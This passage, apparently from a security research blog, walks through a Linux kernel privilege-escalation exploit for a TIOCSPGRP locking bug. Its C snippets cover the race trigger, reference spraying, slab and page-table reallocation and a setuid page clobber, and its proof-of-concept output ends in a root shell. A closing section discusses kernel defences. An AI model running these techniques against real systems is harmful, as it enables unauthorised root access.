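A minimal sketch of the colliding calls (assuming the process starts without a controlling terminal, so that opening the pts end attaches it as such; error handling omitted). Each successful race skews the refcount of whichever struct pid was previously stored in real_tty->pgrp:

#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

static void *race_thread(void *arg) {
    int fd = *(int *)arg;
    pid_t pgrp = getpgrp();  /* must be a process group in our session */
    for (int i = 0; i < 1000000; i++)
        ioctl(fd, TIOCSPGRP, &pgrp);  /* put_pid()/get_pid() on real_tty->pgrp,
                                         locked via *this* end's ctrl_lock */
    return NULL;
}

int main(void) {
    setsid();  /* become session leader so the pts can become our ctty */
    int ptmx_fd = open("/dev/ptmx", O_RDWR | O_NOCTTY);
    grantpt(ptmx_fd);
    unlockpt(ptmx_fd);
    int pts_fd = open(ptsname(ptmx_fd), O_RDWR);  /* attaches as our ctty */

    pthread_t a, b;
    pthread_create(&a, NULL, race_thread, &ptmx_fd);
    pthread_create(&b, NULL, race_thread, &pts_fd);
    pthread_join(a, NULL);
    pthread_join(b, NULL);
    return 0;
}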

Once you understand the issue, the fix seems relatively obvious:

    if (session_of_pgrp(pgrp) != task_session(current))
        goto out_unlock;
    retval = 0;
-   spin_lock_irq(&tty->ctrl_lock);
+   spin_lock_irq(&real_tty->ctrl_lock);
    put_pid(real_tty->pgrp);
    real_tty->pgrp = get_pid(pgrp);
-   spin_unlock_irq(&tty->ctrl_lock);
+   spin_unlock_irq(&real_tty->ctrl_lock);
 out_unlock:
    rcu_read_unlock();
    return retval;

Attack stages

In this section, I will first walk through how my exploit works; afterwards I will discuss different defensive techniques that target these attack stages.

Attack stage: Freeing the object with multiple dangling references

This bug allows us to probabilistically skew the refcount of a struct pid down, depending on which way the race happens: We can run colliding TIOCSPGRP calls from two threads repeatedly, and from time to time that will mess up the refcount. But we don't immediately know how many times the refcount skew has actually happened.

What we'd really want as an attacker is a way to skew the refcount deterministically. We'll have to somehow compensate for our lack of information about whether the refcount was skewed successfully. We could try to somehow make the race deterministic (seems difficult), or after each attempt to skew the refcount assume that the race worked and run the rest of the exploit (since if we didn't skew the refcount, the initial memory corruption is gone, and nothing bad will happen), or we can attempt to find an information leak that lets us figure out the state of the reference count.

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

  1. Allocate a new struct pid (by creating a new task).
  2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up; see the sketch after this list).
  3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
  4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)
  5. Create a new thread, and let that thread attempt to drop all the references we created.
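
A sketch of steps 2 and 4 follows (assumptions: every queued SCM_CREDENTIALS message pins a reference to the sender's struct pid until it is received, and a single datagram socket's receive queue is bounded, so a real exploit spreads the messages across many sockets; error handling omitted):

#define _GNU_SOURCE
#include <linux/membarrier.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <unistd.h>

/* Step 2: queue messages carrying our credentials; each queued skb holds a
   reference to our struct pid. */
static void spray_pid_refs(int sk[2], int count) {
    socketpair(AF_UNIX, SOCK_DGRAM, 0, sk);
    int one = 1;  /* SO_PASSCRED on the receiver, for good measure */
    setsockopt(sk[1], SOL_SOCKET, SO_PASSCRED, &one, sizeof(one));

    struct ucred cred = { .pid = getpid(), .uid = getuid(), .gid = getgid() };
    char data = 'A';
    char cbuf[CMSG_SPACE(sizeof(cred))] = {0};
    struct iovec iov = { &data, 1 };
    struct msghdr msg = {0};
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof(cbuf);
    struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_CREDENTIALS;
    cm->cmsg_len = CMSG_LEN(sizeof(cred));
    memcpy(CMSG_DATA(cm), &cred, sizeof(cred));

    for (int i = 0; i < count; i++)
        sendmsg(sk[0], &msg, 0);  /* messages stay queued on sk[1] */
}

/* Step 4: on kernels with unified RCU flavors, a global membarrier waits for
   (at least) an RCU grace period. (The PoC output further down uses the BPF
   memory-accounting variant instead.) */
static void wait_for_rcu_grace_period(void) {
    syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0);
}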

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
        int nr;
        struct pid_namespace *ns;
};

struct pid
{
        atomic_t count;
        unsigned int level;
        /* lists of tasks that use this pid */
        struct hlist_head tasks[PIDTYPE_MAX];
        struct rcu_head rcu;
        struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
        struct pid_namespace *ns;

        if (!pid)
                return;

        ns = pid->numbers[pid->level].ns;
        if ((atomic_read(&pid->count) == 1) ||
             atomic_dec_and_test(&pid->count)) {
                kmem_cache_free(ns->pid_cachep, pid);
                put_pid_ns(ns);
        }
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

Discarded attack idea: Directly exploiting the UAF at the SLUB level

On the Debian kernel I was looking at, a struct pid in the initial namespace is allocated from the same kmem_cache as struct seq_file and struct epitem - these three slabs have been merged into one by find_mergeable() to reduce memory fragmentation, since their object sizes, alignment requirements, and flags match:

root@deb10:/sys/kernel/slab# ls -l pid
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
root@deb10:/sys/kernel/slab# ls -l | grep :A-0000128
drwxr-xr-x 2 root root 0 Feb  6 00:09 :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 eventpoll_epi -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 seq_file -> :A-0000128
root@deb10:/sys/kernel/slab# 

A straightforward way to exploit a dangling reference to a SLUB object is to reallocate the object through the same kmem_cache it came from, without ever letting the page reach the page allocator. To figure out whether it's easy to exploit this bug this way, I made a table listing which fields appear at each offset in these three data structures (using pahole -E --hex -C <typename> <path to vmlinux debug info>):

offset | pid                         | eventpoll_epi / epitem (RCU-freed)  | seq_file
0x00   | count.counter (4) (CONTROL) | rbn.__rb_parent_color (8) (TARGET?) | buf (8) (TARGET?)
0x04   | level (4)                   |                                     |
0x08   | tasks[PIDTYPE_PID] (8)      | rbn.rb_right (8) / rcu.func (8)     | size (8)
0x10   | tasks[PIDTYPE_TGID] (8)     | rbn.rb_left (8)                     | from (8)
0x18   | tasks[PIDTYPE_PGID] (8)     | rdllink.next (8)                    | count (8)
0x20   | tasks[PIDTYPE_SID] (8)      | rdllink.prev (8)                    | pad_until (8)
0x28   | rcu.next (8)                | next (8)                            | index (8)
0x30   | rcu.func (8)                | ffd.file (8)                        | read_pos (8)
0x38   | numbers[0].nr (4)           | ffd.fd (4)                          | version (8)
0x3c   | [hole] (4)                  | nwait (4)                           |
0x40   | numbers[0].ns (8)           | pwqlist.next (8)                    | lock (0x20): counter (8)
0x48   | ---                         | pwqlist.prev (8)                    |
0x50   | ---                         | ep (8)                              |
0x58   | ---                         | fllink.next (8)                     |
0x60   | ---                         | fllink.prev (8)                     | op (8)
0x68   | ---                         | ws (8)                              | poll_event (4)
0x6c   | ---                         | [hole] (4)                          |
0x70   | ---                         | event.events (4)                    | file (8)
0x74   | ---                         | event.data (8) (CONTROL)            |
0x78   | ---                         |                                     | private (8) (TARGET?)
0x7c   | ---                         | ---                                 |
0x80   | ---                         | ---                                 | ---

In this case, reallocating the object as one of those three types didn't seem to me like a nice way forward (although it should be possible to exploit this somehow with some effort, e.g. by using count.counter to corrupt the buf field of seq_file). Also, some systems might be using the slab_nomerge kernel command line flag, which disables this merging behavior.

Another approach that I didn't look into here would have been to try to corrupt the obfuscated SLUB freelist pointer (obfuscation is implemented in freelist_ptr()); but since that stores the pointer in big-endian, count.counter would only effectively let us corrupt the more significant half of the pointer, which would probably be a pain to exploit.

Attack stage: Freeing the object's page to the page allocator

This section will refer to some internals of the SLUB allocator; if you aren't familiar with those, you may want to at least look at slides 2-4 and 13-14 of Christoph Lameter's slab allocator overview talk from 2014. (Note that that talk covers three different allocators; the SLUB allocator is what most systems use nowadays.)

The alternative to exploiting the UAF at the SLUB allocator level is to flush the page out to the page allocator (also called the buddy allocator), which is the last level of dynamic memory allocation on Linux (once the system is far enough into the boot process that the memblock allocator is no longer used). From there, the page can theoretically end up in pretty much any context. We can flush the page out to the page allocator with the following steps:

  1. Instruct the kernel to pin our task to a single CPU (see the sketch after this list). Both SLUB and the page allocator use per-CPU structures, so if the kernel migrated us to a different CPU in the middle, we would fail.
  2. Before allocating the victim struct pid whose refcount will be corrupted, allocate a large number of objects to drain partially-free slab pages of all their unallocated objects. If the victim object (which will be allocated in step 5 below) landed in a page that is already partially used at this point, we wouldn't be able to free that page.
  3. Allocate around objs_per_slab * (1+cpu_partial) objects - in other words, a set of objects that completely fill at least cpu_partial pages, where cpu_partial is the maximum length of the "percpu partial list". Those newly allocated pages that are completely filled with objects are not referenced by SLUB's freelists at this point because SLUB only tracks pages with free objects on its freelists.
  4. Fill objs_per_slab-1 more objects, such that at the end of this step, the "CPU slab" (the page from which allocations will be served first) will not contain anything other than free space and fresh allocations (created in this step).
  5. Allocate the victim object (a struct pid). The victim page (the page from which the victim object came) will usually be the CPU slab from step 4, but if step 4 completely filled the CPU slab, the victim page might also be a new, freshly allocated CPU slab.
  6. Trigger the bug on the victim object to create an uncounted reference, and free the object.
  7. Allocate objs_per_slab+1 more objects. After this, the victim page will be completely filled with allocations from steps 4 and 7, and it won't be the CPU slab anymore (because the last allocation can not have fit into the victim page).
  8. Free all allocations from steps 4 and 7. This causes the victim page to become empty, but does not free the page; the victim page is placed on the percpu partial list once a single object from that page has been freed, and then stays on that list.
  9. Free one object per page from the allocations from step 3. This adds all these pages to the percpu partial list until it reaches the limit cpu_partial, at which point it will be flushed: Pages containing some in-use objects are placed on SLUB's per-NUMA-node partial list, and pages that are completely empty are freed back to the page allocator. (We don't free all allocations from step 3 because we only want the victim page to be freed to the page allocator.) Note that this step requires that every objs_per_slab-th object the allocator gave us in step 3 is on a different page.
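
Step 1, for reference, is a single affinity call (sketch):

#define _GNU_SOURCE
#include <sched.h>

/* Keep the current thread on one CPU so we keep hitting the same per-CPU
   SLUB and page allocator structures throughout the attack. */
static void pin_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof(set), &set);  /* 0 selects the calling thread */
}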

When the page is given to the page allocator, we benefit from the page being order-0 (4 KiB, native page size): For order-0 pages, the page allocator has special freelists, one per CPU+zone+migratetype combination. Pages on these freelists are not normally accessed from other CPUs, and they don't immediately get combined with adjacent free pages to form higher-order free pages.

At this point we are able to perform use-after-free accesses to some offset inside the free victim page, using codepaths that interpret part of the victim page as a struct pid. Note that at this point, we still don't know exactly at which offset inside the victim page the victim object is located.

Attack stage: Reallocating the victim page as a pagetable

At the point where the victim page has reached the page allocator's freelist, it's essentially game over - at this point, the page can be reused as anything in the system, giving us a broad range of options for exploitation. In my opinion, most defences that act after we've reached this point are fairly unreliable.

One type of allocation that is directly served from the page allocator and has nice properties for exploitation are page tables (which have also been used to exploit Rowhammer). One way to abuse the ability to modify a page table would be to enable the read/write bit in a page table entry (PTE) that maps a file page to which we are only supposed to have read access - for example, this could be used to gain write access to part of a setuid binary's .text segment and overwrite it with malicious code.

We don't know at which offset inside the victim page the victim object is located; but since a page table is effectively an array of 8-byte-aligned elements of size 8 and the victim object's alignment is a multiple of that, as long as we spray all elements of the victim array, we don't need to know the victim object's offset.

To allocate a page table full of PTEs mapping the same file page, we have to (see the sketch after this list):

  • prepare by setting up a 2MiB-aligned memory region (because each last-level page table describes 2MiB of virtual memory) containing single-page mmap() mappings of the same file page (meaning each mapping corresponds to one PTE); then
  • trigger allocation of the page table and fill it with PTEs by reading from each mapping
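
A sketch of both parts (error handling omitted; the path is a placeholder for the target file, e.g. a setuid binary):

#include <fcntl.h>
#include <sys/mman.h>

#define PT_SPAN (2UL << 20)  /* one last-level page table covers 2MiB */

char *prepare_pte_spray(const char *path) {
    int fd = open(path, O_RDONLY);
    /* Reserve 4MiB so a 2MiB-aligned window exists, then map the same file
       page at every 4KiB slot; each slot corresponds to one PTE of a single
       last-level page table. */
    char *area = mmap(NULL, 2 * PT_SPAN, PROT_NONE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    char *base = (char *)(((unsigned long)area + PT_SPAN - 1) & ~(PT_SPAN - 1));
    for (unsigned long off = 0; off < PT_SPAN; off += 0x1000)
        mmap(base + off, 0x1000, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0);
    return base;
}

/* Called after the victim page is on the page allocator's freelist: touching
   each mapping allocates the page table and fills in its PTEs. */
void trigger_pagetable_alloc(volatile char *base) {
    for (unsigned long off = 0; off < PT_SPAN; off += 0x1000)
        (void)base[off];
}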

struct pid has the same alignment as a PTE, and it starts with a 32-bit refcount, so that refcount is guaranteed to overlap the first half of a PTE, which is 64-bit. Because X86 CPUs are little-endian, incrementing the refcount field in the freed struct pid increments the least significant half of the PTE - so it effectively increments the PTE. (Except for the edge case where the least significant half is 0xffffffff, but that's not the case here.)

struct pid: count | level |   tasks[0]  |   tasks[1]  |   tasks[2]  | ... 
pagetable:       PTE      |     PTE     |     PTE     |     PTE     | ...

Therefore we can increment one of the PTEs by repeatedly triggering get_pid(), which tries to increment the refcount of the freed object. This can be turned into the ability to write to the file page as follows:

  • Increment the PTE by 0x42 to set the Read/Write bit and the Dirty bit. (If we didn't set the Dirty bit, the CPU would do it by itself when we write to the corresponding virtual address, so we could also just increment by 0x2 here.)
  • For each mapping, attempt to overwrite its contents with malicious data and ignore page faults.
    • This might throw spurious errors because of outdated TLB entries, but taking a page fault will automatically evict such TLB entries, so if we just attempt the write twice, this can't happen on the second write (modulo CPU migration, as mentioned above).
    • One easy way to ignore page faults is to let the kernel perform the memory write using pread(), which will return -EFAULT on fault (sketched below).
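
Building on the spray sketch above (payload_fd is assumed to be open on a file holding the injected code):

#include <unistd.h>

void clobber_mappings(int payload_fd, char *base, size_t payload_len) {
    for (unsigned long off = 0; off < (2UL << 20); off += 0x1000) {
        /* Writing via pread() makes the kernel take any fault and return
           -EFAULT instead of delivering SIGSEGV to us. */
        pread(payload_fd, base + off, payload_len, 0);
        /* Retry once: the first attempt may have failed on a stale TLB
           entry, which the fault itself evicts. */
        pread(payload_fd, base + off, payload_len, 0);
    }
}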

If the kernel notices the Dirty bit later on, that might trigger writeback, which could crash the kernel if the mapping isn't set up for writing. Therefore, we have to reset the Dirty bit. We can't reliably decrement the PTE because put_pid() inefficiently accesses pid->numbers[pid->level] even when the refcount isn't dropping to zero, but we can increment it by an additional 0x80-0x42=0x3e, which means the final value of the PTE, compared to the initial value, will just have the additional bit 0x80 set, which the kernel ignores.

Afterwards, we launch the setuid executable (which, in the version in the pagecache, now contains the code we injected), and gain root privileges:

user@deb10:~/tiocspgrp$ make
as -o rootshell.o rootshell.S
ld -o rootshell rootshell.o --nmagic
gcc -Wall -o poc poc.c
user@deb10:~/tiocspgrp$ ./poc
starting up...
executing in first level child process, setting up session and PTY pair...
setting up unix sockets for ucreds spam...
draining pcpu and node partial pages
preparing for flushing pcpu partial pages
launching child process
child is 1448
ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...
refcount should now be skewed, child exiting
child exited cleanly
waiting for RCU call...
bpf load with rlim 0x0: -1 (Operation not permitted)
bpf load with rlim 0x1000: 452 (Success)
bpf load success with rlim 0x1000: got fd 452
....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
RCU callbacks executed
gonna try to free the pid...
double-free child died with signal 9 after dropping 9990 references (99%)
hopefully reallocated as an L1 pagetable now
PTE forcibly marked WRITE | DIRTY (hopefully)
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
bash: cannot set terminal process group (1447): Inappropriate ioctl for device
bash: no job control in this shell
root@deb10:/home/user/tiocspgrp# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),120(wireshark)
root@deb10:/home/user/tiocspgrp# 

Note that nothing in this whole exploit requires us to leak any kernel-virtual or physical addresses, partly because we have an increment primitive instead of a plain write; and it also doesn't involve directly influencing the instruction pointer.

Defence

This section describes different ways in which this exploit could perhaps have been prevented from working. To assist the reader, the titles of some of the subsections refer back to specific exploit stages from the section above.

Against bugs being reachable: Attack surface reduction

A potential first line of defense against many kernel security issues is to only make kernel subsystems available to code that needs access to them. If an attacker does not have direct access to a vulnerable subsystem and doesn't have sufficient influence over a system component with access to make it trigger the issue, the issue is effectively unexploitable from the attacker's security context.

Pseudoterminals are (more or less) only necessary for interactively serving users who have shell access (or something resembling that), including:

  • terminal emulators inside graphical user sessions
  • SSH servers
  • screen sessions started from various types of terminals

Things like webservers or phone apps won't normally need access to such devices; but there are exceptions. For example:

  • a web server is used to provide a remote root shell for system administration
  • a phone app's purpose is to make a shell available to the user
  • a shell script uses expect to interact with a binary that requires a terminal for input/output

In my opinion, the biggest limits on attack surface reduction as a defensive strategy are:

  1. It exposes a workaround to an implementation concern of the kernel (potential memory safety issues) in user-facing API, which can lead to compatibility issues and maintenance overhead - for example, from a security standpoint, I think it might be a good idea to require phone apps and systemd services to declare their intention to use the PTY subsystem at install time, but that would be an API change requiring some sort of action from application authors, creating friction that wouldn't be necessary if we were confident that the kernel is working properly. This might get especially messy in the case of software that invokes external binaries depending on configuration, e.g. a web server that needs PTY access when it is used for server administration. (This is somewhat less complicated when a benign-but-potentially-exploitable application actively applies restrictions to itself; but not every application author is necessarily willing to design a fine-grained sandbox for their code, and even then, there may be compatibility issues caused by libraries outside the application author's control.)
  2. It can't protect a subsystem from a context that fundamentally needs access to it. (E.g. Android's /dev/binder is directly accessible by Chrome renderers on Android because they have Android code running inside them.)
  3. It means that decisions that ought to not influence the security of a system (making an API that does not grant extra privileges available to some potentially-untrusted context) essentially involve a security tradeoff.

Still, in practice, I believe that attack surface reduction mechanisms (especially seccomp) are currently some of the most important defense mechanisms on Linux.

Against bugs in source code: Compile-time locking validation

The bug in TIOCSPGRP was a fairly straightforward violation of a straightforward locking rule: While a tty_struct is live, accessing its pgrp member is forbidden unless the ctrl_lock of the same tty_struct is held. This rule is sufficiently simple that it wouldn't be entirely unreasonable to expect the compiler to be able to verify it - as long as you somehow inform the compiler about this rule, because figuring out the intended locking rules just from looking at a piece of code can often be hard even for humans (especially when some of the code is incorrect).

When you are starting a new project from scratch, the overall best way to approach this is to use a memory-safe language - in other words, a language that has explicitly been designed such that the programmer has to provide the compiler with enough information about intended memory safety semantics that the compiler can automatically verify them. But for existing codebases, it might be worth looking into how much of this can be retrofitted.

Clang's Thread Safety Analysis feature does something vaguely like what we'd need to verify the locking in this situation:

$ nl -ba -s' ' thread-safety-test.cpp | sed 's|^   ||'
  1 struct __attribute__((capability("mutex"))) mutex {
  2 };
  3 
  4 void lock_mutex(struct mutex *p) __attribute__((acquire_capability(*p)));
  5 void unlock_mutex(struct mutex *p) __attribute__((release_capability(*p)));
  6 
  7 struct foo {
  8     int a __attribute__((guarded_by(mutex)));
  9     struct mutex mutex;
 10 };
 11 
 12 int good(struct foo *p1, struct foo *p2) {
 13     lock_mutex(&p1->mutex);
 14     int result = p1->a;
 15     unlock_mutex(&p1->mutex);
 16     return result;
 17 }
 18 
 19 int bogus(struct foo *p1, struct foo *p2) {
 20     lock_mutex(&p1->mutex);
 21     int result = p2->a;
 22     unlock_mutex(&p1->mutex);
 23     return result;
 24 }
$ clang++ -c -o thread-safety-test.o thread-safety-test.cpp -Wall -Wthread-safety
thread-safety-test.cpp:21:22: warning: reading variable 'a' requires holding mutex 'p2->mutex' [-Wthread-safety-precise]
    int result = p2->a;
                     ^
thread-safety-test.cpp:21:22: note: found near match 'p1->mutex'
1 warning generated.
$ 

However, this does not currently work when compiling as C code because the guarded_by attribute can't find the other struct member; it seems to have been designed mostly for use in C++ code. A more fundamental problem is that it also doesn't appear to have built-in support for distinguishing the different rules for accessing a struct member depending on the lifetime state of the object. For example, almost all objects with locked members will have initialization/destruction functions that have exclusive access to the entire object and can access members without locking. (The lock might not even be initialized in those states.)

Some objects also have more lifetime states; in particular, for many objects with RCU-managed lifetime, only a subset of the members may be accessed through an RCU reference without having upgraded the reference to a refcounted one beforehand. Perhaps this could be addressed by introducing a new type attribute that can be used to mark pointers to structs in special lifetime states? (For C++ code, Clang's Thread Safety Analysis simply disables all checks in all constructor/destructor functions.)

I am hopeful that, with some extensions, something vaguely like Clang's Thread Safety Analysis could be used to retrofit some level of compile-time safety against unintended data races. This will require adding a lot of annotations, in particular to headers, to document intended locking semantics; but such annotations are probably anyway necessary to enable productive work on a complex codebase. In my experience, when there are no detailed comments/annotations on locking rules, every attempt to change a piece of code you're not intimately familiar with (without introducing horrible memory safety bugs) turns into a foray into the thicket of the surrounding call graphs, trying to unravel the intentions behind the code.

The one big downside is that this requires getting the development community for the codebase on board with the idea of backfilling and maintaining such annotations. And someone has to write the analysis tooling that can verify the annotations.

At the moment, the Linux kernel does have some very coarse locking validation via sparse; but this infrastructure is not capable of detecting situations where the wrong lock is used or of validating that a struct member is protected by a lock. It also can't properly deal with things like conditional locking, which makes it hard to use for anything other than spinlocks/RCU. The kernel's runtime locking validation via LOCKDEP is more advanced, but it focuses on the locking correctness of RCU pointers and on deadlock detection (its main purpose); again, there is no mechanism to, for example, automatically validate that a given struct member is only accessed under a specific lock (which would probably also be quite costly to implement with runtime validation). Also, as a runtime validation mechanism, it can't discover errors in code that isn't executed during testing (although it can combine separately observed behavior into race scenarios without ever actually observing the race).

Against bugs in source code: Global static locking analysis

An alternative approach to checking memory safety rules at compile time is to do it either after the entire codebase has been compiled, or with an external tool that analyzes the entire codebase. This allows the analysis tooling to perform analysis across compilation units, reducing the amount of information that needs to be made explicit in headers. This may be a more viable approach if peppering annotations everywhere across headers isn't viable; but it also reduces the utility to human readers of the code, unless the inferred semantics are made visible to them through some special code viewer. It might also be less ergonomic in the long run if changes to one part of the kernel could make the verification of other parts fail - especially if those failures only show up in some configurations.

I think global static analysis is probably a good tool for finding some subsets of bugs, and it might also help with finding the worst-case depth of kernel stacks or proving the absence of deadlocks, but it's probably less suited for proving memory safety correctness?

Against exploit primitives: Attack primitive reduction via syscall restrictions

(Yes, I made up that name because I thought that capturing this under "Attack surface reduction" is too muddy.)

Because allocator fastpaths (both in SLUB and in the page allocator) are implemented using per-CPU data structures, the ease and reliability of exploits that want to coax the kernel's memory allocators into reallocating memory in specific ways can be improved if the attacker has fine-grained control over the assignment of exploit threads to CPU cores. I'm calling such a capability, which provides a way to facilitate exploitation by influencing relevant system state/behavior, an "attack primitive" here. Luckily for us, Linux allows tasks to pin themselves to specific CPU cores without requiring any privilege using the sched_setaffinity() syscall.

(As a different example, one primitive that can provide an attacker with fairly powerful capabilities is being able to indefinitely stall kernel faults on userspace addresses via FUSE or userfaultfd.)

Just like in the section "Attack surface reduction" above, an attacker's ability to use these primitives can be reduced by filtering syscalls; but while the mechanism and the compatibility concerns are similar, the rest is fairly different:

Attack surface reduction is about limiting access to code that is suspected to contain exploitable bugs; in a codebase written in a memory-unsafe language, that tends to apply to pretty much the entire codebase. Attack surface reduction is often fairly opportunistic: You permit the things you need, and deny the rest by default.

Attack primitive reduction limits access to code that is suspected or known to provide (sometimes very specific) exploitation primitives. For example, one might decide to specifically forbid access to FUSE and userfaultfd for most code because of their utility for kernel exploitation, and, if one of those interfaces is truly needed, design a workaround that avoids exposing the attack primitive to userspace. This is different from attack surface reduction, where it often makes sense to permit access to any feature that a legitimate workload wants to use.

Attack primitive reduction does not normally reliably prevent a bug from being exploited; and an attacker will sometimes even be able to obtain a similar but shoddier (more complicated, less reliable, less generic, ...) primitive indirectly - for example, through the FUSE-based fallback mentioned below.

A nice example of an attack primitive reduction is the sysctl vm.unprivileged_userfaultfd, which was first introduced so that userfaultfd can be made completely inaccessible to normal users and was then later adjusted so that users can be granted access to part of its functionality without gaining the dangerous attack primitive. (But if you can create unprivileged user namespaces, you can still use FUSE to get an equivalent effect.)
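
To make the syscall-filtering variant of this concrete, here is a minimal seccomp-BPF sketch that denies only the userfaultfd() syscall while allowing everything else (error handling and the usual architecture check in the filter are omitted for brevity):

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <stddef.h>
#include <errno.h>

static int deny_userfaultfd(void) {
  struct sock_filter filter[] = {
    /* Load the syscall number from struct seccomp_data. */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    /* If it is userfaultfd, fail with ENOSYS; otherwise allow. */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_userfaultfd, 0, 1),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (ENOSYS & SECCOMP_RET_DATA)),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
  };
  struct sock_fprog prog = {
    .len = sizeof(filter) / sizeof(filter[0]),
    .filter = filter,
  };
  /* Required so unprivileged processes may install a filter. */
  if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
    return -1;
  return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}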

When maintaining lists of allowed syscalls for a sandboxed system component, or something along those lines, it may be a good idea to explicitly track which syscalls are explicitly forbidden for attack primitive reduction reasons, or similarly strong reasons - otherwise one might accidentally end up permitting them in the future. (I guess that's kind of similar to issues that one can run into when maintaining ACLs...)

But like in the previous section, attack primitive reduction also tends to rely on making some functionality unavailable, and so it might not be viable in all situations. For example, newer versions of Android deliberately indirectly give apps access to FUSE through the AppFuse mechanism. (That API doesn't actually give an app direct access to /dev/fuse, but it does forward read/write requests to the app.)

Against oops-based oracles: Lockout or panic on crash

The ability to recover from kernel oopses in an exploit can help an attacker compensate for a lack of information about system state. Under some circumstances, it can even serve as a binary oracle that can be used to more or less perform a binary search for a value, or something like that.

(It used to be even worse on some distributions, where dmesg was accessible for unprivileged users; so if you managed to trigger an oops or WARN, you could then grab the register states at all IRET frames in the kernel stack, which could be used to leak things like kernel pointers. Luckily nowadays most distributions, including Ubuntu 20.10, restrict dmesg access.)

Android and Chrome OS nowadays set the kernel's panic_on_oops flag, meaning the machine will immediately restart when a kernel oops happens. This makes it hard to use oopsing as part of an exploit, and arguably also makes more sense from a reliability standpoint - the system will be down for a bit, and it will lose its existing state, but it will also reset into a known-good state instead of continuing in a potentially half-broken state, especially if the crashing thread was holding mutexes that can never again be released, or things like that. On the other hand, if some service crashes on a desktop system, perhaps that shouldn't cause the whole system to immediately go down and make you lose unsaved state - so panic_on_oops might be too drastic there.

A good solution to this might require a more fine-grained approach. (For example, grsecurity has for a long time had the ability to lock out specific UIDs that have caused crashes.) Perhaps it would make sense to allow the init daemon to use different policies for crashes in different services/sessions/UIDs?

Against UAF access: Deterministic UAF mitigation

One defense that would reliably stop an exploit for this issue would be a deterministic use-after-free mitigation. Such a mitigation would reliably protect the memory formerly occupied by the object from accesses through dangling pointers to the object, at least once the memory has been reused for a different purpose (including reuse to store heap metadata). For write operations, this probably requires either atomicity of the access check and the actual write or an RCU-like delayed freeing mechanism. For simple read operations, it can also be implemented by ordering the access check after the read, but before the read value is used.

A big downside of this approach on its own is that extra checks on every memory access will probably come with an extremely high efficiency penalty, especially if the mitigation can not make any assumptions about what kinds of parallel accesses might be happening to an object, or what semantics pointers have. (The proof-of-concept implementation I presented at LSSNA 2020 (slides, recording) had CPU overhead roughly in the range 60%-159% in kernel-heavy benchmarks, and ~8% for a very userspace-heavy benchmark.)

